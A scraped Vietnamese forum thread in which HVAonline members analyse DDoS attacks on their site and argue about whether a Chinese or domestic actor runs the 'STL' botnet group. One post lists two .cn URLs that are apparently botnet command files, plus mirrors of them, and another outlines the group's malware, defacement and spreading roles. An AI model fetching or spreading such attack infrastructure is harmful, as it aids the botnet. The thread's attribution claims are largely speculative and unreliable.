Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246806 /hvaonline/posts/list/39641.html#246806 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246807 /hvaonline/posts/list/39641.html#246807 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. TMDTHBC đang coi rada thì tập trung vào coi đi, cứ lớ nhớ sang HVA làm gì, bọn khựa nó vác J10 - J15 ra đập nát hết mấy cái trạm rada bi giờ Tình hình qua các bài phân tích của các bác càng ngày càng sáng tỏ, bi giờ nghĩ cách gì để tránh các cú dập tiếp theo của khựa vào các website vietnam đây đau đầu thiệt, STL (Sờ Ti Lơn) nó là 1 tổ chức chặt chẽ và phân công công việc cho từng nhóm phát triển, thì ta có cách nào dập lại nó ko các bác, để chúng nó hoành hành mãi thế này, nản quá]]> /hvaonline/posts/list/39641.html#246809 /hvaonline/posts/list/39641.html#246809 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv wrote:
Cái ông TMDTHBC đang coi rada thì tập trung vào coi đi, cứ lớ nhớ sang HVA làm gì, bọn khựa nó vác J10 - J15 ra đập nát hết mấy cái trạm rada bi giờ Tình hình qua các bài phân tích của các bác càng ngày càng sáng tỏ, bi giờ nghĩ cách gì để tránh các cú dập tiếp theo của khựa vào các website vietnam đây đau đầu thiệt, STL (Sờ Ti Lơn) nó là 1 tổ chức chặt chẽ và phân công công việc cho từng nhóm phát triển, thì ta có cách nào dập lại nó ko các bác, để chúng nó hoành hành mãi thế này, nản quá 
Hihi theo mấy sư huynh HVA học thêm mà, nếu được thì track = googlemap, rồi dựa theo đó mới cập nhật được tình hình thực tế bạn à. Vả lại việc HVA làm là điều tốt mà, người dân Việt Nam đều ủng hộ việc làm chính nghĩa của họ. Note: J10-J15 --> bullshit, 37 ly hay A72 là đủ xử đẹp rồi bạn, mô phỏng thì tốc độ Mach 2.25 nhưng bay cỡ đó thì chỉ có F22 hay Su35 mới tác chiến được. J10-15 bay đến cỡ đó thì ... =)) "bắn rồng nước" thôi. ]]>
/hvaonline/posts/list/39641.html#246824 /hvaonline/posts/list/39641.html#246824 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://wide.ircop.cn/index.txt?113 http://pref.firebay.cn/index.txt?113 đã thay đổi Up lên đây đề phòng nó change phát nữa : http://www.mediafire.com/?fiazi6a1jmyzmci http://www.mediafire.com/?zba22ipikm1fqzp]]> /hvaonline/posts/list/39641.html#246828 /hvaonline/posts/list/39641.html#246828 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246830 /hvaonline/posts/list/39641.html#246830 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246838 /hvaonline/posts/list/39641.html#246838 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/900/39641.html#246798 của bác PXMMRF vẫn đang chỉ là một định hướng cho cách phân tích và nhìn nhận vấn đề theo cách thức phù hợp hơn chứ cũng chưa đưa ra được một dẫn chứng nào thuyết phục cho việc stl là ai cả. Cho tới giờ, mọi thông tin về stl đều chỉ dừng ở mức phỏng đoán và nếu vậy thì em vẫn nghiêng về phía những phỏng đoán dựa vào những dấu hiệu cụ thể (các phân tích kỹ thuật) hơn là cảm quan của một vài người, dù những người đó (bao gồm bác PXMMRF) thường có những nhìn nhận đúng trước đây. Các phân tích về dàn khoan của TQ của bác PXMMRF em vẫn chưa nhìn thấy giá trị trong việc nhận định stl, hơn nữa nó còn làm cho hướng nhận định stl dễ bị sa vào một hướng duy nhất. ]]> /hvaonline/posts/list/39641.html#246842 /hvaonline/posts/list/39641.html#246842 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

hieutd wrote:
Mình đồng ý với ý kiến của bac PXMMRF. Mình thấy anh Conmale cực đoan khi cố tình gán ghép cho CS 
Bạn chắc là dưới 20 tuổi, vẫn chưa biết gì nhiều, vẫn còn tin vào Đảng và chính phủ :D. Bạn lớn thêm tí nữa, biết nhiều thông tin hơn bạn sẽ hiểu. Trước giờ những thông tin mà bạn đọc được từ báo chí trong nước, kiến thức học từ môn văn môn sử trong trường chỉ là những thông tin 1 chiều, chủ quan do chính phủ VN viết thôi bạn à. Phải chịu khó tìm hiểu, sáng suốt nhận xét thì mới phân biệt được đâu là thật đâu là giả.]]>
/hvaonline/posts/list/39641.html#246845 /hvaonline/posts/list/39641.html#246845 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman wrote:
... nếu muốn phá rối một hạ tầng IT của Việtnam thì chắc chắn HVA không phải là đích chuẩn rồi? ...  
Điểm này tôi có chút ý kiến. Đánh vào hạ tầng IT, không hẳn là đánh vào một Datacenter, một ISP hay một cái router nào đó cụ thể, vì còn người là còn khắc phục được, còn chống đỡ được, thậm chí phản công được. HVA hiện nay theo quan sát của tôi, là nơi "tụ họp" thông thường nhất của các chuyên gia kỹ thuật máy tính. Nếu một thế lực nào đó muốn phá hoại tận gốc nền IT của Việt Nam, thì họ phải ngăn cản các chuyên gia của ta gặp gỡ và thảo luận, làm chúng ta chia rẽ, nghi ngờ lẫn nhau. Đó có thể ( chỉ là phỏng đoán ) là lý do các thế lực này trong thời gian qua, đưa HVA vào danh sách tấn công, bôi nhọ và chia rẽ. Mặt khác, để có HVA như hôm nay, một tổ chức lớn có uy tín, có thâm niên kinh nghiệm, có lòng tin của anh chị em chuyên gia, không phải ngày một, ngày hai có thể gầy dựng được. Nói cách khác, với các thế lực muốn phá hoại hạ tầng IT của Việt Nam, triệt hạ HVA là một mục tiêu rất quan trọng, có khả năng gây thiệt hại đáng kể ( khó đo lường được ở hiện tại ) Ai cần bằng chứng, thì topic này chính là bằng chứng, các bài viết của anh TQN đã và đang làm điều mà các thế lực kia lo sợ khi HVA tồn tại. Tôi tin rằng, sau anh TQN, sẽ còn có nhiều TQN khác tiếp bước công việc chính nghĩa mà anh làm]]>
/hvaonline/posts/list/39641.html#246847 /hvaonline/posts/list/39641.html#246847 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

hvthang wrote:
Post /hvaonline/posts/list/900/39641.html#246798 của bác PXMMRF vẫn đang chỉ là một định hướng cho cách phân tích và nhìn nhận vấn đề theo cách thức phù hợp hơn chứ cũng chưa đưa ra được một dẫn chứng nào thuyết phục cho việc stl là ai cả. ............................................  

hvthang wrote:
Các phân tích về dàn khoan của TQ của bác PXMMRF em vẫn chưa nhìn thấy giá trị trong việc nhận định stl, hơn nữa nó còn làm cho hướng nhận định stl dễ bị sa vào một hướng duy nhất.  
Phân tích về dàn khoan của tôi chỉ là một "Thí dụ" nhằm minh hoạ cho một quan điểm của tôi là:

PXMMRF wrote:
Cũng cần nói thêm là việc quan sát và biết về một bối cảnh, hoàn cảnh không đồng nghĩa với việc đã nhận thức nó một cách đúng đắn và sâu sắc. Thí dụ... 
Vì vậy nó không liên quan gì đến STL hay chính xác hơn là tổ chức lãnh đạo (sai khiến) STL cả. Khi đọc các bài tôi viết, xin một số bạn chịu khó bỏ ra vài phút nghiền ngẫm. Không phải là "Nói Sơn Tây, chết cây Hà nội", mà có đôi chỗ, đôi câu là "Ý tại ngôn ngoại" đấy!

hvthang wrote:
Cho tới giờ, mọi thông tin về stl đều chỉ dừng ở mức phỏng đoán và nếu vậy thì em vẫn nghiêng về phía những phỏng đoán dựa vào những dấu hiệu cụ thể (các phân tích kỹ thuật) hơn là cảm quan của một vài người, dù những người đó (bao gồm bác PXMMRF) thường có những nhìn nhận đúng trước đây.  
Thì các "dấu hiệu cụ thể (các phân tích kỹ thuật)" mà bạn viết chính là cái tôi gọi là các "hiện tượng" trong bài viết trên đây của tôi. Chỉ có điều tôi nói thêm là: "Nếu xét riêng từng hiện tượng, tách rời nó với các hiện tượng khác, chúng ta sẽ khó xác định hay tìm ra những mối liên quan với danh tính hay động cơ của những người can dự vào sự kiện. Nghĩa là chúng ta khó coi nó là một bằng chứng (evidence) tin cậy. Nhưng nếu chúng ta gôp chung chúng, tổng hơp chúng với nhau và đặt chúng trong một bối cảnh, hoàn cảnh cụ thể thì lai thấy những bằng chứng rất đáng tin cậy." Ngoài ra tôi còn đề nghị phải tìm hiểu, nhận xét bối cảnh, hoàn cảnh đó một cách toàn diện, chính xác và sâu sắc. -------------------------- Nhân đây tôi "bật mí" cho các bạn một thông tin. Trong bài viết đánh giá về tổ chức của STL (bao gồm chính bản thân STL và bộ phận lãnh đạo, hướng dẫn nó) trong topic này tôi có viết một câu:

PXMMRF ngay17/08/2011 luc 15:44:12 wrote:
Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ.  
Bai viết tại: /hvaonline/posts/list/450/39641.html#245191 Thì nay xin tiết lộ, câu viết trên đây ám chỉ sự kiện sau: http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html Vào thời gian viết bài nói trên, tôi đã biết sư kiện này và đang tìm hiểu nó. Vì chưa tìm hiểu kỹ nên chưa thể thông báo. Nay báo NLĐ và Tuổi trẻ online đã thông báo sự kiện, nên không còn gì là bí mật nữa. Tuy nhiên thực tế nghiêm trong và kinh hãi hơn thông tin trên báo nhiều. ]]>
/hvaonline/posts/list/39641.html#246850 /hvaonline/posts/list/39641.html#246850 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat wrote:

Nowhereman wrote:
... nếu muốn phá rối một hạ tầng IT của Việtnam thì chắc chắn HVA không phải là đích chuẩn rồi? ...  
Điểm này tôi có chút ý kiến. Đánh vào hạ tầng IT, không hẳn là đánh vào một Datacenter, một ISP hay một cái router nào đó cụ thể, vì còn người là còn khắc phục được, còn chống đỡ được, thậm chí phản công được. HVA hiện nay theo quan sát của tôi, là nơi "tụ họp" thông thường nhất của các chuyên gia kỹ thuật máy tính. Nếu một thế lực nào đó muốn phá hoại tận gốc nền IT của Việt Nam, thì họ phải ngăn cản các chuyên gia của ta gặp gỡ và thảo luận, làm chúng ta chia rẽ, nghi ngờ lẫn nhau. Đó có thể ( chỉ là phỏng đoán ) là lý do các thế lực này trong thời gian qua, đưa HVA vào danh sách tấn công, bôi nhọ và chia rẽ. Mặt khác, để có HVA như hôm nay, một tổ chức lớn có uy tín, có thâm niên kinh nghiệm, có lòng tin của anh chị em chuyên gia, không phải ngày một, ngày hai có thể gầy dựng được. Nói cách khác, với các thế lực muốn phá hoại hạ tầng IT của Việt Nam, triệt hạ HVA là một mục tiêu rất quan trọng, có khả năng gây thiệt hại đáng kể ( khó đo lường được ở hiện tại ) Ai cần bằng chứng, thì topic này chính là bằng chứng, các bài viết của anh TQN đã và đang làm điều mà các thế lực kia lo sợ khi HVA tồn tại. Tôi tin rằng, sau anh TQN, sẽ còn có nhiều TQN khác tiếp bước công việc chính nghĩa mà anh làm 
@xnohat : mình đồng ý với anh ở điểm " HVA là một mục tiêu quan trọng" +" HVA là nơi uy tin và hội tụ của các chuyên gia IT thực thụ " . bản thân các anh em chuyên gia IT của các tổ chức có tiếng trong nước cũng nhiều người là thành viên của HVA, nhưng mình thiết nghĩ nếu thực tế sảy ra một sự cố cho hạ tầng IT của Việtnam thì chắc chắn trước hết sẽ là nhiệm vụ của Vncert , C15 , BKIS ... chứ chắc khô sảy ra trường hợp. Chính quyền cần tới sự trợ giúp của các chuyên gia HVA trước ??? ( mặc dù thực tế các anh HVA có thể giúp sức giải quết ). từ điều này => là nếu thực chất muốn triệt phá hạ tầng cở sở IT và Uy tín của các chuyên gia IT trong nước thì danh sách ddos sẽ phải có Vncert , BKIS , .v.v. rồi mới tới HVA chứ ? ]]>
/hvaonline/posts/list/39641.html#246862 /hvaonline/posts/list/39641.html#246862 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman wrote:
@xnohat : mình đồng ý với anh ở điểm " HVA là một mục tiêu quan trọng" +" HVA là nơi uy tin và hội tụ của các chuyên gia IT thực thụ " . bản thân các anh em chuyên gia IT của các tổ chức có tiếng trong nước cũng nhiều người là thành viên của HVA, nhưng mình thiết nghĩ nếu thực tế sảy ra một sự cố cho hạ tầng IT của Việtnam thì chắc chắn trước hết sẽ là nhiệm vụ của Vncert , C15 , BKIS ... chứ chắc khô sảy ra trường hợp. Chính quyền cần tới sự trợ giúp của các chuyên gia HVA trước ??? ( mặc dù thực tế các anh HVA có thể giúp sức giải quết ). từ điều này => là nếu thực chất muốn triệt phá hạ tầng cở sở IT và Uy tín của các chuyên gia IT trong nước thì danh sách ddos sẽ phải có Vncert , BKIS , .v.v. rồi mới tới HVA chứ ?  
Thực tế, sau khi a TQN tiến hành phân tích và bước đầu vạch mặt đám Botnet của stl thì hva mới bị ddos. Điều đó có nghĩa là mục tiêu ddos hva có thể chỉ là sự trả thù, không muốn thông tin (server,phương thức hoạt động, che giấu...) của mạng botnet của họ bị quá nhiều người, tổ chức biết đến vì khi có nhiều người biết đương nhiên các AV cũng sẽ vào cuộc. Đồng thời cũng có ý đồ cảnh cáo cho a TQN để a không tiếp tục RCE số vr này nữa( điều này a TQN đã viết trước đây). Vì vậy theo mình nguyên nhân của việc hva bị ddos có thể không liên quan nhiều lắm đến mục đích phá hoại hạ tầng IT của VN.]]>
/hvaonline/posts/list/39641.html#246866 /hvaonline/posts/list/39641.html#246866 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:

Nowhereman wrote:
@xnohat : mình đồng ý với anh ở điểm " HVA là một mục tiêu quan trọng" +" HVA là nơi uy tin và hội tụ của các chuyên gia IT thực thụ " . bản thân các anh em chuyên gia IT của các tổ chức có tiếng trong nước cũng nhiều người là thành viên của HVA, nhưng mình thiết nghĩ nếu thực tế sảy ra một sự cố cho hạ tầng IT của Việtnam thì chắc chắn trước hết sẽ là nhiệm vụ của Vncert , C15 , BKIS ... chứ chắc khô sảy ra trường hợp. Chính quyền cần tới sự trợ giúp của các chuyên gia HVA trước ??? ( mặc dù thực tế các anh HVA có thể giúp sức giải quết ). từ điều này => là nếu thực chất muốn triệt phá hạ tầng cở sở IT và Uy tín của các chuyên gia IT trong nước thì danh sách ddos sẽ phải có Vncert , BKIS , .v.v. rồi mới tới HVA chứ ?  
Thực tế, sau khi a TQN tiến hành phân tích và bước đầu vạch mặt đám Botnet của stl thì hva mới bị ddos. Điều đó có nghĩa là mục tiêu ddos hva có thể chỉ là sự trả thù, không muốn thông tin (server,phương thức hoạt động, che giấu...) của mạng botnet của họ bị quá nhiều người, tổ chức biết đến vì khi có nhiều người biết đương nhiên các AV cũng sẽ vào cuộc. Đồng thời cũng có ý đồ cảnh cáo cho a TQN để a không tiếp tục RCE số vr này nữa( điều này a TQN đã viết trước đây). Vì vậy theo mình nguyên nhân của việc hva bị ddos có thể không liên quan nhiều lắm đến mục đích phá hoại hạ tầng IT của VN. 
@mylove14129 : mình thấy nhận xét này của anh mylove14129 ( Bkis) là một nhận xét sác đáng. Vậy thì có hai khả năng suy diễn như sau : a) anh TQN chắc hẳn đã biết rõ sự thật về đám STL này đến 75 % ( thậm trí đã từng có thời ...chén chú chén anh :|) -> ( iem thử làm thám tữ conan một chút, đúng sai thế nào mong anh TQN thông cảm ạ ). b) thực sự bọn STL này đang âm mưu một "lịch làm thịt" có tính toán và có tính chất chính trị và kinh tế ở tầm "Tàu khựa " ( suy luận của anh PXMMRF ) . sâu hơn root và rộng hơn cả internet ! từ a) và b) =? STL là ai . nhiều người đã rõ và cũng ngần ấy người don't know ! :| ]]>
/hvaonline/posts/list/39641.html#246868 /hvaonline/posts/list/39641.html#246868 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Phụ lục: stl có ít nhất là 3 nhóm chuyên 3 công tác khác nhau: - Nhóm 1: chuyên lo tạo và tái tạo malware. Nhóm này lân la rất nhiều những nơi thảo luận và phá tán malware (cũ và mới). 80% malware của stl là dùng các thư viện có sẵn, phần còn lại có thể dùng lại những thứ đã được dùng ở đâu đó, có thể được xào nấu và cải tiến qua thời gian (hãy xem biến thái từ thời vecebot đến nay thì rõ). Trong nhóm này, có 2 phần đặc thù: malware để ddos và malware để đánh cắp thông tin. - Nhóm 2: chuyên công tác deface và thu thập thông tin cá nhân. Thông tin thu thập được sẽ được phân loại và chọn lựa ra từng nhóm đối tượng và từng đối tượng để "xử lý" cụ thể. Nhóm này chuyên lùng các bugs phổ biến trên các loại blogs, forum, cms... để tấn công. Họ dùng "shells" có sẵn và xài nấu thêm chút đỉnh để làm khó những ai có ý định tìm hiểu hoặc truy lùng. Các đối tượng bị tấn công có thể bị deface hoặc có thể giữ nguyên trạng để đánh lừa dư luận. - Nhóm 3: chuyên phát tán malware và "thu hoạch" nạn nhân. Nhóm này có thể gởi mass emails ra hoặc từng cá nhân hoặc dàn dựng cơ sở để lây lan với quy mô lớn. Nhóm này có thể kèm theo công tác (và có sự giúp đỡ của các nhóm kia) với công tác nguỵ tạo trang web, nguỵ tạo blogs và gây nhiễu, gây ngờ vực trong cộng đồng mạng. Nhóm này nặng về phía "công tác tư tưởng" và ít kỹ thuật hơn. PS: Nếu tớ là stl của TQ, tớ dùng cơ sở hạng tầng ở Mỹ, Nga, Ukraine và Châu Âu, thậm chí cả cơ sở hạng tầng ở TQ và hoàn toàn trao đổi nhau bằng tiếng Anh hoặc tiếng Pháp để đánh lừa dư luận. Chỉ có điều, nếu tớ là stl của TQ thì tớ không hơi đâu đi đánh phá mấy cái blogs trên mạng.]]> /hvaonline/posts/list/39641.html#246881 /hvaonline/posts/list/39641.html#246881 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246886 /hvaonline/posts/list/39641.html#246886 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:
@all : vấn đề liên quan đến chính trị bao giờ cũng phức tạp. Những thứ chúng ta nhìn thấy, tưởng rõ ràng rồi nhưng thực tế có khi lại không phải như vậy. Tôi thích anh A không có nghĩa là tôi không dò xét anh ấy, tôi ghét anh B không có nghĩa là tôi lúc nào cũng phải tỏ ra thù ghét B. Còn rất nhiều vấn đề (kinh tế , chính trị,...) mà tôi còn phải phụ thuộc cả vào A và B. Nên : mọi thứ chỉ là phỏng đoán, phân tích kỹ thuật sẽ khó mà tìm ra được đích danh cá nhân hoặc tổ chức nào đứng sau stl. Trên hva hiện tại đang có ít nhất 2 luồng quan điểm về việc stl là ai ?, ai là tc đứng sau stl? Ai cũng có lý lẽ để tin tưởng vào quan điểm của mình. Theo mình nên tập trung vào những vấn đề kỹ thuật nhiều hơn và "hạn chế" bàn luận về vấn đề khác vì mọi thứ đều chưa rõ ràng @kutruoi : mình không phải là người BKIS. Chỉ là một người thích tìm hiểu về CNTT không hơn không kém :)  
Nếu mọi thứ đã rõ ràng thì còn gì để mà bàn? :-) . "Bàn" ở đây là thảo luận và nêu ra ý kiến cá nhân để đưa vấn đề đến một điểm nào đó. Nếu sự thể đã rõ thì chỉ còn là chuyện tán kháo (theo kiểu tán sau khi đọc báo) vậy thôi. Kỹ thuật luôn luôn nằm trong mọi khía cạnh của đời sống, kể cả chính trị, văn hoá, văn chương, ngôn ngữ, kỹ thuật.... Bản thân chính trị không có gì xấu hoặc sai hoặc "nhạy cảm" mà chỉ có chính người đối diện nó có cảm nhận như vậy. Thật ra, chính trị là một môn (một ngành khoa học) và chính trị chẳng phải là thứ "bẩn thỉu" hay "nhạy cảm" hay "phức tạp" như nhiều người cảm nhận. "Sạch" hay "bẩn", "thật" hay "giả", "tốt" hay "xấu" là do cảm nhận và cách nhìn của từng cá nhân. Nếu "chính trị" được dùng như một thứ công cụ để làm những việc tốt thì nó tốt, thật thì nó thật, dối thì nó dối, bẩn thì nó bẩn. Trong đời sống bình thường, ngay cả câu nói "lựa lời mà nói cho vừa lòng nhau" cũng là một dạng "chính trị" rồi. Hành động "lựa lời" này hàm chứa sự thật hay giả dối là do người nói ra nó và do người nghe được nó. Tính chất của hành động "lựa lời" vẫn là chính trị. Nói về khía cạnh "chính trị" trong vấn đề HVA (và những trang web khác) bị tấn công, "chính trị" là cốt lõi cũng như là động lực cho việc tấn công. Nói khác hơn, nếu không có động lực thì tình trạng này đã không xảy ra và nếu chỉ xét mỗi khía cạnh "kỹ thuật" thì chỉ mới có xét đến phương tiện thực thi động lực (hiện tượng) chớ chưa hề đụng tới khía cạnh động lực (bản chất). Muốn đi đến tận cùng của vấn đề thì nên đi đến bản chất của nó thay vì tránh né vì lý do "nhạy cảm" nào đó, đặc biệt đối với những người làm việc có liên quan đến khoa học.]]>
/hvaonline/posts/list/39641.html#246889 /hvaonline/posts/list/39641.html#246889 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

mylove14129 wrote:
@all : vấn đề liên quan đến chính trị bao giờ cũng phức tạp. Những thứ chúng ta nhìn thấy, tưởng rõ ràng rồi nhưng thực tế có khi lại không phải như vậy. Tôi thích anh A không có nghĩa là tôi không dò xét anh ấy, tôi ghét anh B không có nghĩa là tôi lúc nào cũng phải tỏ ra thù ghét B. Còn rất nhiều vấn đề (kinh tế , chính trị,...) mà tôi còn phải phụ thuộc cả vào A và B. Nên : mọi thứ chỉ là phỏng đoán, phân tích kỹ thuật sẽ khó mà tìm ra được đích danh cá nhân hoặc tổ chức nào đứng sau stl. Trên hva hiện tại đang có ít nhất 2 luồng quan điểm về việc stl là ai ?, ai là tc đứng sau stl? Ai cũng có lý lẽ để tin tưởng vào quan điểm của mình. Theo mình nên tập trung vào những vấn đề kỹ thuật nhiều hơn và "hạn chế" bàn luận về vấn đề khác vì mọi thứ đều chưa rõ ràng @kutruoi : mình không phải là người BKIS. Chỉ là một người thích tìm hiểu về CNTT không hơn không kém :)  
Nếu mọi thứ đã rõ ràng thì còn gì để mà bàn? :-) . "Bàn" ở đây là thảo luận và nêu ra ý kiến cá nhân để đưa vấn đề đến một điểm nào đó. Nếu sự thể đã rõ thì chỉ còn là chuyện tán kháo (theo kiểu tán sau khi đọc báo) vậy thôi. Kỹ thuật luôn luôn nằm trong mọi khía cạnh của đời sống, kể cả chính trị, văn hoá, văn chương, ngôn ngữ, kỹ thuật.... Bản thân chính trị không có gì xấu hoặc sai hoặc "nhạy cảm" mà chỉ có chính người đối diện nó có cảm nhận như vậy. Thật ra, chính trị là một môn (một ngành khoa học) và chính trị chẳng phải là thứ "bẩn thỉu" hay "nhạy cảm" hay "phức tạp" như nhiều người cảm nhận. "Sạch" hay "bẩn", "thật" hay "giả", "tốt" hay "xấu" là do cảm nhận và cách nhìn của từng cá nhân. Nếu "chính trị" được dùng như một thứ công cụ để làm những việc tốt thì nó tốt, thật thì nó thật, dối thì nó dối, bẩn thì nó bẩn. Trong đời sống bình thường, ngay cả câu nói "lựa lời mà nói cho vừa lòng nhau" cũng là một dạng "chính trị" rồi. Hành động "lựa lời" này hàm chứa sự thật hay giả dối là do người nói ra nó và do người nghe được nó. Tính chất của hành động "lựa lời" vẫn là chính trị. Nói về khía cạnh "chính trị" trong vấn đề HVA (và những trang web khác) bị tấn công, "chính trị" là cốt lõi cũng như là động lực cho việc tấn công. Nói khác hơn, nếu không có động lực thì tình trạng này đã không xảy ra và nếu chỉ xét mỗi khía cạnh "kỹ thuật" thì chỉ mới có xét đến phương tiện thực thi động lực (hiện tượng) chớ chưa hề đụng tới khía cạnh động lực (bản chất). Muốn đi đến tận cùng của vấn đề thì nên đi đến bản chất của nó thay vì tránh né vì lý do "nhạy cảm" nào đó, đặc biệt đối với những người làm việc có liên quan đến khoa học. 
@conmale : em hoàn toàn có chung quan điểm với anh về vấn đề này; và hoàn toàn bị anh thuyết phục bởi tính rõ ràng, mạch lạc của vấn đề, và tính cụ thể không lập lờ về quan điểm trong ý kiến anh vừa đưa ra trên đây. nhiều người vì điều này điều khác hoặc vì khả năng của chính họ. họ chỉ mãi sống như một điều gì đó không rõ ràng. trong làm ăn kinh doanh họ có khái niệm " grey business ", trong kỹ thuật họ có " đi tắt đón đầu, nắm bắt công nghệ ", trong thế giới hacker họ có "mũ nâu ",trong chính trị họ có " phát triển kinh tế thị trường THEO đường lối xã hội chủ nghĩa ", trong quan điểm tôn giáo họ " vô thần NHƯNG vái lạy gốc đa, gốc đề, xem bói, hoá vàng buôn thần bán thánh, gọi vong, nói chuyện với người cõi âm, tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai . =)) & :-( vì =(( ]]>
/hvaonline/posts/list/39641.html#246921 /hvaonline/posts/list/39641.html#246921 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Đi tắt đón đầu, đón bắt công nghệ" (câu này bạn viết ẩu, không hết ý, phải viết rõ là công nghệ gì chứ?) hoàn toàn không phải là chuyện sai. Nước Nhật cũng đã làm như vậy sau chiến tranh thế giới thứ hai, nên họ mới đuổi kịp Mỹ. Về công nghệ, theo tôi, hiện nay họ vẫn đứng ở mức tiên tiến, chỉ kém Mỹ ở một vài lĩnh vưc. TQ chưa thể so sánh với họ được. Vấn đề chỉ là đi tắt đón đầu nắm bắt công nghệ cao, tiên tiến theo cách nào cho đúng mà thôi. Thứ hai là tại sao bạn lại có thể viết câu này: "tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai." Bạn đang sống ở VN hay ở Mỹ?. Sau chiến tranh, có rất nhiều cựu chiến binh VN, bỏ ra rất nhiều tiền bạc, thời gian, công sức của mình ra để tìm hài cốt đồng đội. Với họ "Nghĩa tử là nghĩa tận". Họ muốn tìm lai những vết tích còn lai của những người đã cùng mình chiến đấu, cùng vui buồn có nhau, cùng chia nắm cơm nguôi trước giờ khai chiến, đắp chung một tấm chăn rách. Họ làm như vậy không vì một chế độ, một lý tưởng cao xa nào cả, cũng không làm để lâp công, thăng chức, vì họ đã về hưu, giải ngũ từ lâu rồi. Họ làm vì tình người, vì một tình cảm thiêng liêng giữa những người luôn phải đối mặt với cái chết, cái mất mát xé lòng. Vì vậy nói những người ấy chỉ đi tìm xương lợn chứ không phải là hài cốt của đồng đôi chẳng những là đã thoá mạ họ một cách tàn ác và ngu suẩn, mà còn thiếu hẳn đi một tấm lòng của con người nhân hậu. Việt nam cũng tham gia tìm hài cốt của lính Mỹ chết trong chiến tranh. Tôi nghĩ đó là việc cần thiết và nhân đạo. Hài cốt của lính Mỹ cũng cần được trân trong như hài cốt của bộ đội VN. Vì bản tính của người Việt là "Nghĩa tử là nghĩa tận". ]]> /hvaonline/posts/list/39641.html#246942 /hvaonline/posts/list/39641.html#246942 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246946 /hvaonline/posts/list/39641.html#246946 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi wrote:
@conmale : em hoàn toàn có chung quan điểm với anh về vấn đề này; và hoàn toàn bị anh thuyết phục bởi tính rõ ràng, mạch lạc của vấn đề, và tính cụ thể không lập lờ về quan điểm trong ý kiến anh vừa đưa ra trên đây. nhiều người vì điều này điều khác hoặc vì khả năng của chính họ. họ chỉ mãi sống như một điều gì đó không rõ ràng. trong làm ăn kinh doanh họ có khái niệm " grey business ", trong kỹ thuật họ có " đi tắt đón đầu, nắm bắt công nghệ ", trong thế giới hacker họ có "mũ nâu ",trong chính trị họ có " phát triển kinh tế thị trường THEO đường lối xã hội chủ nghĩa ", trong quan điểm tôn giáo họ " vô thần NHƯNG vái lạy gốc đa, gốc đề, xem bói, hoá vàng buôn thần bán thánh, gọi vong, nói chuyện với người cõi âm, tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai . =)) & :-( vì =((  
Mình nghĩ kutruoi đã viết ẩu câu mình tô đỏ ở trên. Đáng lẽ viết : gọi vong, nói chuyện với cõi âm ĐỂ tìm hài cốt liệt sĩ thì kutruoi lại viết đánh dấu phẩy dẫn đến hiểu lầm. Qua những phân tích, chứng cớ anh Conmale nêu ra mình cũng tin STL không có liên quan đến nước ngoài. Những hướng khác không có dẫn chứng, bằng chứng giá trị.]]>
/hvaonline/posts/list/39641.html#246949 /hvaonline/posts/list/39641.html#246949 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246951 /hvaonline/posts/list/39641.html#246951 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246952 /hvaonline/posts/list/39641.html#246952 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi wrote:
trong quan điểm tôn giáo họ " vô thần NHƯNG vái lạy gốc đa, gốc đề, xem bói, hoá vàng buôn thần bán thánh, gọi vong, nói chuyện với người cõi âm, tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai . & vì  
bạn có vơ đũa cả nắm không khi nói như vậy?hay cái youtube cho bạn ý nghĩ đó?phiến diện,thiếu thực tế.một số người bán rẽ lương tâm,bạn cũng đang bán rẽ thứ mà chúng ta ta ngồi lại với nhau,nói chuyện với nhau đó là người việt và tiếng việt.bên phải hay trái nếu đứng trước gương bạn đưa tay trái ?nhận định rõ ràng là nhận định cần có sự suy xét về ngữ và nghĩa cảnh. ps: viết xong mới thấy đoạn này:

kutruoi wrote:
c) em vừa rời USA về việt nam ở rồi . các bác thông cảm nha.  
bạn là người thiểu năng.ít nhất với tôi là bạn không hoặc lười suy nghĩ ]]>
